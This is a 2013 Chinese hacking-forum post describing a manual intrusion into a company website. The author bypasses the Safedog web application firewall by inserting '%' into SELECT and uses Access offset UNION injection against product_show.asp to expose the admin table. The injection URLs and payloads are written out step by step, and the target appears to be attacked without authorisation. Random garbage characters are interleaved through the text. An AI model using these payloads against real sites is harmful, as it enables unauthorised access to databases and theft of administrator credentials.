中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]
作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。  c4 _/ Q% R# q/ f) j; t) m

% V; I( {2 z( E2 V: R1 r) _$ B7 Z$ j" ]
顺手加个admin! C' }' U* u3 c

' w0 k) j' R+ \5 t! Q" y' {) ~* H; }  `" a
默认后台。9 R+ F. X% _* _8 e
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
4 ^+ V% a; |1 W$ v
( e- Q& M$ h- Z  A: M: o& p" i: A: @8 J) P/ q1 c
3 a- v6 ~" x$ U6 C. R- ]* q
所以就不用御剑扫了,待会直接封IP。  T" A! v2 d$ z* p) f  _
$ l+ f' W, k. s# b. E  u  m
用order by语句判断是否存在注入。
1 K9 Y% T: L4 q8 U7 _5 D; D2 y' Dhttp://www.xxx.com /product_show.asp?id=997 order by 1* a+ w! o! W1 Y2 [# j6 ]( i
http://www.xxx.com /product_show.asp?id=997 order by 100
3 D& U, U3 H1 ^4 W5 U) c现在存在注入,经测试后发现是9个字段。
* h/ b" n0 q0 R& n
2 \  Y+ k% _5 }/ D; m. X接下来进行联合查询,猜是否存在admin表。
5 Z$ j' d/ M. g4 }http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
& J6 M' X0 x/ y2 E5 h' y
; w: e  A( G& o
& U# o$ {$ c9 G. b! g; ~- l+ N! X4 w
在select中间加个%,se%lect绕过安全狗。. K1 T8 {- z! e# P
( T7 [! T, k- u& A  \( Z4 O
. W+ J. X. B' q( B
发现存在admin表,然后开始手工猜常用的字段。
8 Z& U7 M- W0 Y, q! c) k纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。: t6 Y% H2 }7 T& C

# c" c- B  H/ E9 u  b突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。& u+ m" M* Z7 p. k) _

, |% R" @3 {3 S. C科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。' q  t  O& O/ E
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin3 o$ q6 t2 K7 L, I
好了,敏感内容出显了。​
' z3 O, t. N4 [% ]6 k! T
- [+ a& j8 s/ g; m/ B: M9 F5 j% `1 Z5 E
2 u4 f4 L( o9 o+ ~




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2